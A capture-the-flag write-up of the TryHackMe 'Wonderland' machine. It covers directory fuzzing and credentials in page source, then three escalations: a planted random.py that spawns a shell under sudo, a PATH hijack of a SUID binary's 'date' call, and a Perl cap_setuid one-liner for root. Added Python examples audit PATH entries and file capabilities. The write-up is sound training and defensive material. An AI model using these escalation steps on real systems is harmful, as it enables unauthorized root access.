Wonderland Writeup (TryHackMe Medium Machine)
Fall down the rabbit hole, enter wonderland and capture the flags.
Overview
Wonderland is a medium Linux machine from TryHackMe. It is a box with an Alice in Wonderland theme, including multiple references to the movie.
It starts with a little puzzle, where we have to fuzz our way through the directories to a certain page which contains credentials. We use those to SSH into the machine.
Once inside, we start to pivot to other users. We find a Python script which imports the “random” library. We create a file of that name ourselves, with a malicious payload inside, which the script then executes.
Next, we find a SUID binary which calls the “date” command without an absolute path. We hijack that lookup by modifying the PATH variable, causing the binary to load our custom malicious code first.
We end the journey by abusing the capabilities of the Perl binary, granting us the ultimate root shell.
Nmap scan
Starting with Nmap scan.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.218.104 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-28 07:01 EDT
Nmap scan report for 10.10.218.104
Host is up (0.057s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 50.65 ms 10.9.0.1
2 50.91 ms 10.10.218.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds
The Nmap scan showed that 2 ports are open: port 22 for SSH and port 80 for a Golang HTTP server. Next, I moved on to the website titled “Follow the white rabbit”.
Website exploration & finding password for “alice”
I visited the website and was greeted with the White Rabbit himself. It seemed like this site tells a story and I have to follow it all the way to the end. I checked the entire page but found nothing.

I ran Gobuster to enumerate directories and got a few results back.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://10.10.218.104" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 64 -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.218.104
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 200) [Size: 153]
/r (Status: 200) [Size: 258]
/poem (Status: 200) [Size: 1565]
I looked at all the directories. Directory “/img” contained a couple of images from the story, “/poem” had a poem about the Jabberwock on it and “/r” looked like the next part of the story.

I re-ran Gobuster here and got back a new directory, “/a”. It looked very similar to the last one, but with a different line from the conversation between Alice and the Cat.

I repeated the process all the way to “/r/a/b/b/i/t” with an invitation to Alice’s Wonderland.

Fun fact: if you extract the hidden messages from the images found under “/img” with Steghide, one of them gives you the hint “follow the r a b b i t”.
Another Gobuster scan showed nothing new. After that, I checked the page source and found a pair of credentials for a potential user “alice”.
[Image: credentials for user “alice” found in the source code]
I tried to SSH into the machine with those credentials, and it was a success.
Gaining access via SSH & pivoting to user “rabbit”
I checked my user’s home directory and found the root flag, which I couldn’t read. There was also a Python script that printed 10 random lines from another poem, about the walrus and the carpenter.
alice@wonderland:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
I went down my usual checklist of privilege escalation techniques, like checking sudo permissions, SUID binaries, environment variables, cron jobs and so on, but I couldn’t find anything helpful.
After some time, I went back to the Python script and looked at its source code once again. The very first line was “import random”, which I had completely overlooked the first time. I checked my sudo permissions again: I could run this walrus_and_the_carpenter script as user “rabbit”.
alice@wonderland:~$ cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
==================================
[POEM CONTINUES]
==================================
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Since this “random” library was resolved by name and nothing prevented me from shadowing it, I could create my own “random.py” in the script’s directory, which would spawn a shell as user “rabbit” when loaded. And it worked perfectly.
alice@wonderland:~$ cat random.py
import os
os.system("/bin/bash")
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
rabbit@wonderland:~$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
rabbit@wonderland:~$
Pivoting to user “hatter”
I navigated to my user’s home directory and listed the files present there.

There was an interesting ELF file with the SUID bit set, named “teaParty”. I ran it to see what it does. The program mentioned the Mad Hatter, who could be another user on this machine, “hatter”.
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Fri, 28 Mar 2025 14:57:58 +0000
Ask very nicely, and I will give you some tea while you wait for him
please
Segmentation fault (core dumped)
It said that the Mad Hatter would be here by a certain time. I checked the date on the machine. The difference was always exactly one hour, which is way too long to wait.
rabbit@wonderland:/home/rabbit$ date
Fri Mar 28 13:58:19 UTC 2025
So I copied the binary to my machine for closer inspection, using Python3’s built-in HTTP server to transfer it.
I opened Ghidra, an interactive disassembler (with decompiler) for static binary analysis that is used a lot in reverse engineering and is a free alternative to IDA. Ghidra disassembled and decompiled the binary and produced pseudo-code based on the assembly.
[Image: Ghidra’s decompiled pseudo-code; we can see “date” being used]
We can see here that the program runs “date” to produce the time it prints. An idea sparked in my mind: maybe it’s the same trick as last time. We need to override whatever the program resolves as “date” and spawn a shell as user “hatter” with it.
I created a file called “date” in the “/tmp” directory. Inside the file, I wrote two lines of Bash to spawn a shell. Don’t forget to mark it as executable.
rabbit@wonderland:/tmp$ chmod +x date
rabbit@wonderland:/tmp$ cat date
#!/bin/bash
/bin/bash
rabbit@wonderland:/tmp$
Next, I prepended “/tmp” to the “PATH” environment variable. “PATH” stores the directories that are searched for binaries, so you don’t have to type the absolute path each time you run one. By placing our directory at the start, we ensure it gets searched first.
rabbit@wonderland:/tmp$ cd /home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH="/tmp:$PATH"
rabbit@wonderland:/home/rabbit$ $PATH
bash: /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin: No such file or directory
rabbit@wonderland:/home/rabbit$
All that was left to do was to run the “teaParty” binary. And we got a shell as “hatter”.
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
hatter
hatter@wonderland:/home/rabbit$
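Two things line up to make this work: the SUID binary calls “date” by bare name, and it inherits the caller’s PATH (sudo’s secure_path, visible in the earlier “sudo -l” output, only applies to commands run through sudo, not to a SUID binary executed directly). The following is an added example, not code from the box or the writeup: it reproduces command resolution over a constructed PATH with two fake “date” files, and contains an audit function that flags the PATH entries a privileged program should never trust (world-writable, relative, or nonexistent). Directory names and the harmless “date” scripts are constructed for the demo.

```python
import os
import shutil
import stat
import tempfile


def resolve_command(name: str, path_env: str):
    """Return the file a bare command name resolves to under `path_env`, or None.

    shutil.which walks PATH left to right exactly as a shell does, so the first
    directory holding an executable `name` wins; that ordering is the whole hijack.
    """
    return shutil.which(name, path=path_env)


def audit_path(path_env: str) -> list:
    """Flag PATH entries that let an unprivileged user control command resolution.

    Returns (entry, reason) pairs; an empty list means nothing suspicious.
    """
    findings = []
    for entry in path_env.split(os.pathsep):
        if entry in ("", "."):
            findings.append((entry, "empty/dot entry: the current directory is searched"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry: resolves differently per working directory"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            findings.append((entry, "does not exist: whoever can create it controls it"))
            continue
        if not stat.S_ISDIR(mode):
            findings.append((entry, "not a directory"))
        elif mode & stat.S_IWOTH:
            findings.append((entry, "world-writable: other users can drop binaries here"))
    return findings


def build_demo():
    """Constructed filesystem for the demo: a /tmp-like world-writable directory and
    a /usr/bin-like locked-down one, each holding an executable called `date`."""
    base = tempfile.mkdtemp(prefix="path-demo-")
    writable = os.path.join(base, "tmp")
    safe = os.path.join(base, "usr-bin")
    for directory, perms in ((writable, 0o1777), (safe, 0o755)):
        os.mkdir(directory)
        fake = os.path.join(directory, "date")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho from " + directory + "\n")  # harmless marker only
        os.chmod(fake, 0o755)
        os.chmod(directory, perms)
    return writable, safe


if __name__ == "__main__":
    tmp_like, bin_like = build_demo()
    hijacked = tmp_like + os.pathsep + bin_like   # what `export PATH="/tmp:$PATH"` produces
    print("date resolves to:", resolve_command("date", hijacked))
    for entry, reason in audit_path(hijacked + os.pathsep + "/nonexistent-path-demo-xyz"):
        print("PATH entry", entry, "->", reason)
```

With the world-writable directory first, “date” resolves there; with it last, it resolves to the locked-down copy. The durable fix belongs in the binary: call /bin/date by absolute path (or build the time with localtime() and never shell out), and have any SUID program reset its environment rather than inherit PATH from the caller.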
Exploiting Perl capabilities & getting both user flag and root flag
Friendly reminder: there is a file with a password in hatter’s home directory, serving as a checkpoint for us (we don’t have to redo all the pivoting; we can just log in as hatter).
I ran down my usual checklist of privilege escalation techniques and stumbled upon a very interesting result while checking binary capabilities.
hatter@wonderland:~$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
We can see that the binary “/usr/bin/perl” has the “cap_setuid+ep” capability, which means it can change its UID (User Identifier) to any user, even “root” in this case.
Perl is a high-level, general-purpose programming language known for its powerful text-processing capabilities. It was originally developed as a Unix scripting language for report processing but has since evolved into a versatile language used for system administration, web development, network programming, and more. (ChatGPT)
In Linux, capabilities are a security feature that allows fine-grained control over privileged operations. Instead of giving a process full root access, capabilities allow granting only the necessary privileges. (ChatGPT)
With the help of ChatGPT, I was able to exploit this. You can also use GTFOBins though.
We can abuse Perl’s capability here. First, we set our UID to 0, which always represents “root”. Second, we invoke “/bin/bash” to give ourselves a shell.
[Image: ChatGPT spitting out our exploit]
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/bash";'
root@wonderland:~# cd /root
root@wonderland:/root# ls -la
total 28
drwx--x--x 4 root root 4096 May 25 2020 .
drwxr-xr-x 23 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 May 25 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 25 2020 .ssh
-rw-r--r-- 1 root root 32 May 25 2020 user.txt
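File capabilities are easy to miss in a review because they live in extended attributes rather than the mode bits that SUID audits look at. The following is an added example, not code from the box or the writeup: it parses “getcap -r /” output in both the older “path = caps” syntax shown above and the newer “path caps” syntax of recent libcap, and flags capabilities that are root-equivalent when attached to something a user can drive with their own code, with interpreters called out explicitly. The sample lines are the three from the box plus one constructed line in the newer format; the list of root-equivalent capabilities and the interpreter name pattern are this example’s own choices.

```python
import os
import re

# Constructed sample: the three lines from the box's `getcap -r /` output, plus one
# line in the newer libcap format (`cap_x=flags`, no " = "), so both syntaxes are parsed.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
"""

# Capabilities that amount to root when held by a program the user can steer
# with their own code. This set is a judgement call for the demo, not an official list.
ROOT_EQUIVALENT = frozenset({
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
})

# Basenames that take arbitrary code from the caller (assumed pattern for the demo).
INTERPRETER_RE = re.compile(r"^(perl|python|ruby|php|node|lua|tclsh)[\d.]*$")
CAP_TOKEN_RE = re.compile(r"^(cap_\w+)([+=-][eip]*)?$")


def parse_getcap_line(line: str):
    """Parse one getcap line into (path, {capability: flags}).

    Handles `path = cap_a,cap_b+eip` (older libcap) and `path cap_a=eip` (newer).
    Flags written once after a comma-separated group apply to the whole group.
    """
    line = line.strip()
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        path, capstr = line.rsplit(None, 1)
    caps, pending = {}, []
    for token in capstr.split(","):
        match = CAP_TOKEN_RE.match(token.strip())
        if not match:
            raise ValueError("unrecognised capability token: " + token)
        pending.append(match.group(1))
        if match.group(2):                     # operator seen: flags close the group
            for name in pending:
                caps[name] = match.group(2)[1:]
            pending = []
    return path, caps


def audit_capabilities(getcap_output: str) -> list:
    """Return findings for file capabilities that hand out root-equivalent power.

    Each finding is a dict with path, cap, flags and why it was flagged. Only
    effective ("e") capabilities count: without it the file cannot use the power.
    """
    findings = []
    for raw in getcap_output.splitlines():
        if not raw.strip():
            continue
        path, caps = parse_getcap_line(raw)
        is_interp = bool(INTERPRETER_RE.match(os.path.basename(path)))
        for cap, flags in caps.items():
            if cap in ROOT_EQUIVALENT and "e" in flags:
                why = "root-equivalent capability"
                if is_interp:
                    why += " on an interpreter: anyone who can run it gets the power"
                findings.append({"path": path, "cap": cap, "flags": flags, "why": why})
    return findings


if __name__ == "__main__":
    for finding in audit_capabilities(SAMPLE_GETCAP):
        print(finding["path"], finding["cap"] + "+" + finding["flags"], "-", finding["why"])
```

On this box the two Perl entries are flagged and mtr-packet is not: cap_net_raw lets a tool open raw sockets, which is what it needs and nothing more, whereas cap_setuid on an interpreter is root for everyone who can run it. The remediation is to drop the capability (setcap -r /usr/bin/perl) and, if a Perl script genuinely needs it, give it to a wrapper that only that script can reach.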
The user flag was in the “/root” directory. If you remember, the root flag was in Alice’s home directory, and now we can read it. The flags switched places, it seems. It’s all upside down.
Summary
Wonderland is a medium machine from TryHackMe. The box starts with a website with a simple puzzle where we have to do some directory fuzzing. After completing it, we get our first credentials and can SSH into the machine. Once we get in, there are multiple vulnerabilities from various areas of Linux waiting for us. This includes tricking a script into importing and executing our malicious piece of code, overriding a command a binary calls by modifying the “PATH” environment variable, and abusing Perl capabilities to get a root shell. Along the way, we pivot between multiple users. Although this machine has an Alice in Wonderland theme and simple puzzles, it still tackles vulnerabilities which you can see in the real world as well. I liked this box a lot. It’s a good, not-that-serious hacking challenge. I recommend it to anybody who needs a rest from all the serious machines.